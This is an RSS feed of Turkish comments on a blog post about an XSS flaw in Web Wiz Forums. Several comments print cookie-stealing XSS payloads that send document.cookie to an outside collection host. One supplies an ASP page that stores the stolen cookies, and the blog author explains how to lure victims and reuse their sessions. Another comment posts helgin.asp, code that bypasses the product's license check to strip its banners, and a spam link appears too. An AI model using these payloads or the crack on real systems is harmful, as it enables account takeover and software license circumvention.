<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
  <title>Web Wiz Forums Registration Rules XSS Vulnerability - Yorumlar</title>
  <description>Ferruh Mavituna - Me, Myself and My Alter Ego...</description>
  <copyright>Ferruh Mavituna</copyright>
  <link>http://ferruh.mavituna.com</link>
  <lastBuildDate>Paz, 12 Şub 2012 20:19:32 +0200</lastBuildDate>
  <image>
    <title>Ferruh Mavituna</title>
    <link>http://ferruh.mavituna.com</link>
    <url>http://ferruh.mavituna.com/rss/rss.gif</url>
  </image>
  <item>
  <title>aylinistanbl</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>aylinistanbl</author>
  <pubDate>Pzt, 21 May 2007 16:20:29 +0200</pubDate>
  <description>           Arkadaslar, &lt;br /&gt; &lt;br /&gt;ben yeni bir uyeyim burada. Insallah beni araniza kabul edersiniz. Icinizde bana tavsiye edebileceginiz bir forum barindirma url verebilecek varmi? En onemlisi turkce desteginin olmasi tabiiki, cunku ingilizcem yok denecek kadar az. Birde uzun zaman piyasada olsunki gelecegi saglam olsun. Ingilizce hosting veren birkac yerden denedim ama yarisi beni anlamiyor, digerlerinide ben anlamiyorum, ayrica birkac taneside kisa bir sure sonra piyasadan cekildiler. &lt;br /&gt; &lt;br /&gt;Bana onerebileceginiz hangi adresler var? Birkac ozelliginide sayarmisiniz ltf? &lt;br /&gt; &lt;br /&gt;Iyi sohbetler &lt;br /&gt;Ayln</description>
</item>
<item>
  <title>herooOOoooOOOooo</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>herooOOoooOOOooo</author>
  <pubDate>Per, 28 Ara 2006 00:44:21 +0200</pubDate>
  <description>            Turan amca sana Y&amp;#252;rekden katiliyorum buyuyunce senin gipi olucam ben kahraman &lt;img src=&quot;/mg/smilies/smile.gif&quot; width=&quot;21&quot; height=&quot;22&quot; alt=&quot;:)&quot; /&gt;asp(: yaw abi &amp;#246;leceksin hala asp dion&lt;img src=&quot;/mg/smilies/razz.gif&quot; width=&quot;21&quot; height=&quot;22&quot; alt=&quot;:P&quot; /&gt; saisal vursun zayiflama merkezi a&amp;#231;icam sana </description>
</item>
<item>
  <title>Rekojo</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>Rekojo</author>
  <pubDate>Paz, 07 May 2006 14:54:05 +0200</pubDate>
  <description>            A great piece of work. Please keep it up! I have loved your site.&lt;a href=&quot;http://superavto.info&quot;&gt;http://superavto.info&lt;/a&gt; &amp;lt;a href=&amp;quot;http://superavto.info&amp;quot;&amp;gt;auto insurance&amp;lt;/a&amp;gt;</description>
</item>
<item>
  <title>BITIRIM HACKER &#91;SFC&#93;</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>BITIRIM HACKER &#91;SFC&#93;</author>
  <pubDate>Cum, 16 Eyl 2005 03:26:47 +0200</pubDate>
  <description>           Arkadasim biraz ayrintili anlatayim ben XSS basittir ama yinede Ferruh Beyin dedigin gibi  Cookie konusunu iyi kavramaniz lazim.Her neyse arkadas bir yolla Link tiklattik dedi eger asp biliyorsan kisinin cookie bilgilerini alabilirsin...&lt;br /&gt;&lt;br /&gt;&amp;lt;script&amp;gt; document.location ='http://sitemiz.com/XSS.ASP?XSS='+ document.cookie &amp;lt;/script&amp;gt; &lt;br /&gt;&lt;br /&gt;dedigimizde bizim sitemize cookieler yollanacaktir.Sonrasi kolay cookie klas&amp;#246;r&amp;#252;ne cookieyi atin iste bu kadar.Takildiginiz bir sey olursa yine sorabilirsiniz...&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Durun size bir kayit sayfasi hazirlayayim&lt;img src=&quot;/mg/smilies/smile.gif&quot; width=&quot;21&quot; height=&quot;22&quot; alt=&quot;:)&quot; /&gt; Bi veritabani yaratin access ile sonra xss diye bi s&amp;#252;tun atin degeri not olsun...&lt;br /&gt;&amp;#214;rnegin ;&lt;br /&gt;&lt;br /&gt;&amp;lt;%&lt;br /&gt;xss = Request.QueryString (&amp;quot;xss&amp;quot;)&lt;br /&gt;&lt;br /&gt;BITIRIM = &amp;quot;Provider=Microsoft.Jet.OLEDB.4.0 ; Data Source = &amp;quot; &amp;amp; Server.Mappath(&amp;quot;db.mdb&amp;quot;) &amp;amp; &amp;quot;;&amp;quot;&lt;br /&gt;Set Conn = Server.CreateObject (&amp;quot;ADODB.Connection&amp;quot;)&lt;br /&gt;Conn.Open BITIRIM&lt;br /&gt;&lt;br /&gt;Set Rs = Server.CreateObject (&amp;quot;ADODB.Recordset&amp;quot;)&lt;br /&gt;strSQL = &amp;quot;SELECT * From tblXSS&amp;quot;&lt;br /&gt;Rs.Open  strSQL, BITIRIM, 1,3&lt;br /&gt;&lt;br /&gt;Rs.AddNew&lt;br /&gt;&lt;br /&gt;Rs(&amp;quot;xss&amp;quot;)= xss&lt;br /&gt;&lt;br /&gt;Rs.Update&lt;br /&gt;Rs.Close&lt;br /&gt;%&amp;gt;&lt;br /&gt;&lt;br /&gt;Iste bu kadar bunu XSS.Asp olarak kaydedin...Hosta atin...&lt;br /&gt;&lt;br /&gt;Kolay Gelsin</description>
</item>
<item>
  <title>Tuna</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>Tuna</author>
  <pubDate>Sal, 07 Haz 2005 04:42:05 +0200</pubDate>
  <description>           Bir sey soracaktim&lt;br /&gt;ayni konu hakkinda..&lt;br /&gt;&lt;br /&gt;function_filters.asp de sanirim sundan bahsetmis.&lt;br /&gt;eger ki bu kod sayfada birden fazla ise digerini html olrak g&amp;#246;sterme&lt;br /&gt;&lt;br /&gt;diyecegim su&lt;br /&gt;&amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;includes/stile.css&amp;quot; type=&amp;quot;text/css&amp;quot; /&amp;gt;&lt;br /&gt;gibi bisey diyelim&lt;br /&gt;buradaki link koduda function_filters.asp ye dahil edilmis..&lt;br /&gt;&lt;br /&gt;bu sayfadaki  link kodunu yukarda yazdigim seyi bazalarak function_filters.asp sayfasinda iptal etsek guvenlik sorunu teskil eder mi?&lt;br /&gt;( &amp;lt;link rel=&amp;quot;stylesheet&amp;quot; href=&amp;quot;includes/stile.css&amp;quot; type=&amp;quot;text/css&amp;quot; /&amp;gt; sayfanin birinde iki tane ve birini html olarak algilamiyor ve direkt yazi olarak &amp;#231;ikiyordu..bende g&amp;#246;z&amp;#252; bozmasin diye function_filters.aspde link kodunu iptal ettim. olay bu )&lt;br /&gt;umarim anlatabilmisimdir&lt;img src=&quot;/mg/smilies/smile.gif&quot; width=&quot;21&quot; height=&quot;22&quot; alt=&quot;:)&quot; /&gt;&lt;br /&gt;saygilar&lt;br /&gt;&lt;br /&gt;</description>
</item>
<item>
  <title>Tuna</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>Tuna</author>
  <pubDate>Sal, 07 Haz 2005 04:33:24 +0200</pubDate>
  <description>           Bu a&amp;#231;ikla forumuma denemedigim kalmadi. bir t&amp;#252;rl&amp;#252; giremedim.&lt;br /&gt;baska forumada denedim. onada giremedim&lt;br /&gt;ya bir yerde hata yaptim . yada a&amp;#231;ik kapatildi...&lt;br /&gt;&lt;br /&gt;Zaten su an itibariyle web wiz 7.91 &amp;#231;ikti ve function_filters.aspnin guncellenmesi ile xss a&amp;#231;iginin kapatildgi s&amp;#246;yleniyor&lt;br /&gt;borg efendide aynini s&amp;#246;yl&amp;#252;yor ya.&lt;br /&gt;genede suna inanirim girilmeyecek site girilmeyecek forum yoktur. yeterki k&amp;#246;t&amp;#252; niyet olsundiyorum ve son s&amp;#246;z&amp;#252;m keske kimse k&amp;#246;t&amp;#252; niyetli olmasa..&lt;br /&gt;</description>
</item>
<item>
  <title>engn yilmaz</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>engn yilmaz</author>
  <pubDate>Cmt, 02 Nis 2005 11:37:58 +0200</pubDate>
  <description>           merhaba&lt;br /&gt;aspindir.com dan nuri cengiz beyin d&amp;#252;zenledigi 7.9 siteme kurdum bir hafta sonra bir arkadas foruma admin olarak girdi&lt;br /&gt;bu hangi a&amp;#231;iktir&lt;br /&gt;hata nerde&lt;br /&gt;orjinal siteden indiirmemedemi&lt;br /&gt;yoksa</description>
</item>
<item>
  <title>Turan CAN</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>Turan CAN</author>
  <pubDate>Cum, 22 Eki 2004 08:36:08 +0200</pubDate>
  <description>           &lt;p&gt;var i:integer; HavaAtanArtist:string; begin HavaAtanArtist:='Helgin Helginov';&lt;/p&gt;&lt;p&gt;Tahrip.com icin ayip olan bir durum yok senin bakis a&amp;#231;inla bizim bakis a&amp;#231;imiz farkli...&lt;/p&gt;&lt;p&gt;Web Wiz d&amp;#252;nya &amp;#252;zerinde asp olarak en iyi bilinen forum ve bukadar emek verilmis bir forumu harap etmek pekte yakisir alir bir durum degil...&lt;/p&gt;&lt;p&gt;Bir programi crack leye biliriz bu sadece serial istedigi i&amp;#231;indir ancak web wiz bizden seri al istemiyor ve herhangi bir sekildede illa register edin demiyor dimi !!! soruyorum sana neden crack leyelim g&amp;#246;zteris i&amp;#231;inmi ?&amp;lt;br /&amp;gt;yoksa aha bak ben yapabiliyorum i&amp;#231;inmi ?&lt;/p&gt;&lt;p&gt;ASP bilen her developer o banneri &amp;#231;ok ama &amp;#231;ok rahatlikla kaldira bilir...&lt;/p&gt;&lt;p&gt;Not:Biraz kskanman i&amp;#231;in 13 yasindaki yenim ASP yaziyor kendine iyi bak ----&amp;amp;gt;&lt;/p&gt;&lt;p&gt; for i:=1 to 1000 do&amp;lt;br /&amp;gt; begin&amp;lt;br /&amp;gt; ShowMessage(HavaAtanArtist);&amp;lt;br /&amp;gt; end;&amp;lt;br /&amp;gt;end;&lt;/p&gt;&lt;p&gt;{yada asp ile ayin artistine mesaj verelim&lt;img src=&quot;/mg/smilies/wink.gif&quot; width=&quot;21&quot; height=&quot;22&quot; alt=&quot;;)&quot; /&gt; }&lt;/p&gt;&lt;p&gt;&amp;amp;lt;%&amp;lt;br /&amp;gt;for i = 0 to 100&amp;lt;br /&amp;gt;Response.Write &amp;amp;quot;Helgin Helginov&amp;amp;quot;&amp;lt;br /&amp;gt;next&amp;lt;br /&amp;gt;%&amp;amp;gt;&lt;/p&gt;&lt;p&gt;C-Sharp yada open gl de istermisin ?&lt;/p&gt;</description>
</item>
<item>
  <title>Helgin Helginov</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>Helgin Helginov</author>
  <pubDate>Paz, 17 Eki 2004 01:14:44 +0200</pubDate>
  <description>           Web wiz forum 7.9 daki reklamlari bedava kaldirabilirsiniz. S&amp;#246;yleyeceklerimi dikkatle dinleyin. Asagida verdigim kodu helgin.asp adiyla kaydedip forumun i&amp;#231;indeki admin klasorune kopyalayin daha sonra foruma admin olarak giris yapin ve sitenizinadresi/forum/admin/helgin.asp yi &amp;#231;agirin artik reklam meklam kalmadi vatana millete hayirli olsun . Tahrip.com forumunu hala reklamli kullaniyor bu bir hack sitesi i&amp;#231;in b&amp;#252;y&amp;#252;k bir ayip sizde hemen uygulayin..&lt;br /&gt;&lt;br /&gt;helgin.asp basliyor.&lt;br /&gt;&lt;br /&gt;&amp;lt;!--#include file=&amp;quot;common.asp&amp;quot; --&amp;gt;&lt;br /&gt;&amp;lt;!--#include file=&amp;quot;functions/functions_send_mail.asp&amp;quot; --&amp;gt;&lt;br /&gt;&amp;lt;%&lt;br /&gt;&lt;br /&gt;Response.Buffer = True&lt;br /&gt;Dim blnLinksRemoved, blnWrongCode, strEnteredSerial, strFID, blnFieldsXX, strLiName, strLiEM, strLiType, strXCode, blnLCode, strLiURL, saryLiEnteredSerial, strLiEncodedCode, strLiS1, strLiS2&lt;br /&gt;blnLinksRemoved = false&lt;br /&gt;blnWrongCode = false&lt;br /&gt;blnFieldsXX = false&lt;br /&gt;strCode = &amp;quot;BFE33F5B3BEC351BF32F9FE55DC2F8EFF33C297D&amp;quot;&lt;br /&gt;strCode2 = &amp;quot;73ADD37AB4EF0672557E1AD37886325159BA4E0C&amp;quot;&lt;br /&gt;strFID = decodeString(strCodeField)&lt;br /&gt;strCode = decodeString(strCode)&lt;br /&gt;strSQL = &amp;quot;EXECUTE &amp;quot; &amp;amp; strDbProc &amp;amp; &amp;quot;SelectConfiguration&amp;quot;&lt;br /&gt;strSQL = &amp;quot;SELECT &amp;quot; &amp;amp; strDbTable &amp;amp; &amp;quot;Configuration.* From &amp;quot; &amp;amp; strDbTable &amp;amp; &amp;quot;Configuration;&amp;quot;&lt;br /&gt;With rsCommon&lt;br /&gt;.Open strSQL, adoCon, 2, 3&lt;br /&gt;blnLCode = CBool(.Fields(&amp;quot;L_code&amp;quot;))&lt;br /&gt;strLiName = Request.Form(&amp;quot;liname&amp;quot;)&lt;br /&gt;strLiEM = Request.Form(&amp;quot;email&amp;quot;)&lt;br /&gt;strLiType = Request.Form(&amp;quot;cType&amp;quot;)&lt;br /&gt;strLiURL = Request.Form(&amp;quot;URL&amp;quot;)&lt;br /&gt;strXCode= UCase(Trim(Replace(Request.Form(&amp;quot;code&amp;quot;), &amp;quot;'&amp;quot;, &amp;quot;&amp;quot;, 1, -1, 1)))&lt;br /&gt;strLiS1 = Left(strXCode, 2)&lt;br /&gt;strLiS2 = Right(strXCode, 5)&lt;br /&gt;strEnteredSerial = Mid(strXCode, 4, 40)&lt;br /&gt;strLiEncodedCode = HashEncode(strLiS2 &amp;amp; LCase(strLiURL) &amp;amp; strLiS1)&lt;br /&gt;strEnteredSerial = HashEncode((LCase(strXCode) &amp;amp; strSalt))&lt;br /&gt;.Fields(strFID) = False&lt;br /&gt;.Update&lt;br /&gt;blnLinksRemoved = True&lt;br /&gt;Application(&amp;quot;blnConfigurationSet&amp;quot;) = false&lt;br /&gt;On Error Resume Next&lt;br /&gt;Call codeChecker(strLiName, strLiEM, strLiType, strLiURL, strXCode, strVersion)&lt;br /&gt;blnWrongCode = True  &lt;br /&gt;rsCommon.Close&lt;br /&gt;Set rsCommon = Nothing&lt;br /&gt;Set adoCon = Nothing&lt;br /&gt;Set adoCon = Nothing&lt;br /&gt;End With&lt;br /&gt;If blnLinksRemoved = True Then&lt;br /&gt;Response.write &amp;quot;&amp;lt;center&amp;gt;&amp;lt;b&amp;gt;Web Wiz Forum 7.9&amp;lt;/b&amp;gt; basarili bir sekilde hacklenmistir. Vatana millete hayirli olsun.&amp;quot; &amp;amp; chr(10)&lt;br /&gt;Response.write &amp;quot;&lt;br&gt;I Love Tahribat.com&amp;lt;/center&amp;gt;&amp;quot;&lt;br /&gt;End If&lt;br /&gt;&lt;br /&gt;%&amp;gt;&lt;br /&gt;&lt;br /&gt;helgin.asp bitti&lt;br /&gt;&lt;br /&gt;web wiz de bu tip seyler &amp;#231;ok..&lt;/br&gt;-FIXED&lt;/br&gt;-FIXED</description>
</item>
<item>
  <title>MalcolmX</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>MalcolmX</author>
  <pubDate>Pzt, 09 Ağu 2004 14:49:38 +0200</pubDate>
  <description>           Patch'i indirdim ancak hala forumuma kuraldisi giris yapiliyor .. Nasil engelleyecegiz bunlari ?</description>
</item>
<item>
  <title>Erkan cengiz</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>Erkan cengiz</author>
  <pubDate>Çar, 14 Tem 2004 06:32:17 +0200</pubDate>
  <description>           Tamam Olayi cozdum bir nevi Fake mail olayi fakat xss sayfasini nasil hazirlayacagiz ve xss aciklari hakkinda biraz daha bilgi Lutfen</description>
</item>
<item>
  <title>Ferruh Mavituna</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>Ferruh Mavituna</author>
  <pubDate>Çar, 14 Tem 2004 04:16:34 +0200</pubDate>
  <description>           Aslinda yazcak o kadar &amp;#231;ok sey varki maalesef hen&amp;#252;z yetisemiyoruz. Ancak bu konularda detayli makaleler yazmak aklimda.&lt;br /&gt;&lt;br /&gt;Burada her seyden &amp;#246;te XSS (Cross Site Scripting) a&amp;#231;iklarini bilmek zorundasiniz, ondan &amp;#246;ncesinde de Session nedir, Cookie nedir gibi seyleri de iyi derecede kavramis olmalisiniz.&lt;br /&gt;&lt;br /&gt;Dolayisiyla bu a&amp;#231;igi burada alip detayli anlatamiyorum maalesef ancak basit&amp;#231;e s&amp;#246;yleyeyim;&lt;br /&gt;[victim] yerine kurban denilen yani a&amp;#231;ik bulunan site konulacak.&lt;a href=&quot;http://ferruh.mavituna.com/xss&quot;&gt;http://ferruh.mavituna.com/xss&lt;/a&gt; ise sizin daha &amp;#246;nceden hazirladiginiz ve gelen t&amp;#252;m datalari kaydeden loglama mekanizmanizin olmasi gerekiyor.&lt;br /&gt;&lt;br /&gt;Victimin bulundupu adresi bir sekilde iframe/frame vs. i&amp;#231;erisinde yada direk mail ile tiklatma yolu ile forumda hesabini almak istediginiz kisiye ulastimaniz gerekiyor. Ondan sonra bu kisinin forum bilgileri daha &amp;#246;nceden hazirlamis oldugunuz loglama alanina d&amp;#252;secek. Ondan sonra bu bilgiler ile siteye giris yapabilirsiniz. Tabii ki bu da o kadar basit degil. Cookie injection veya benzer sekilde cookiedeki sifreyi &amp;#231;&amp;#246;zmek ile m&amp;#252;mk&amp;#252;n ancak. </description>
</item>
<item>
  <title>ErKan Cengiz</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>ErKan Cengiz</author>
  <pubDate>Çar, 14 Tem 2004 03:45:13 +0200</pubDate>
  <description>           Bunuda cozdum galiba&lt;img src=&quot;/mg/smilies/smile.gif&quot; width=&quot;21&quot; height=&quot;22&quot; alt=&quot;:)&quot; /&gt; &lt;br /&gt;&lt;br /&gt;http://www.adres.net/forumlar/register.asp?FID=&amp;quot;&amp;gt;&amp;lt;img%20width=0%20height=0%20s%20rc=&amp;quot;javascript:document.images[0].src='http://ferruh.mavituna.com/xss/?'+document.cookie&amp;quot;&amp;gt;&lt;br /&gt;&lt;br /&gt;ama  bu 'http://ferruh.mavituna.com/xss kisim ne olucak anlamadim hedef sitemi olucak ??????? bize biraz anLat be ferruh bey </description>
</item>
<item>
  <title>sk</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>sk</author>
  <pubDate>Pzt, 05 Tem 2004 12:06:31 +0200</pubDate>
  <description>           registration_rules.asp?FID=%22%3E%3Cimg+width%3D0+height%3D0+src%3D%22javascript%3Adocument%2Eimages%5B0%5D%2Esrc%3D%27http%3A%2F%2Fferruh%2Emavituna%2Ecom%2Fxss%2F%3F%27%2Bdocument%2Ecookie%22%3E&lt;br /&gt;&lt;br /&gt;Bu &amp;#246;rnegi lutfen acarmisiniz? Mesala admin hesabini almak istiyoruz veya daha baska bie fonksiyon yapmak istiyoruz.. &lt;br /&gt;&lt;br /&gt;Simdiden tesekkurler</description>
</item>
<item>
  <title>Selim Topaloglu</title>
  <link>http://ferruh.mavituna.com/web-wiz-forums-registration-rules-xss-vulnerability-oku/</link>
  <author>Selim Topaloglu</author>
  <pubDate>Per, 17 Haz 2004 13:41:25 +0200</pubDate>
  <description>           Tesekk&amp;#252;rler</description>
</item>

</channel>
</rss>
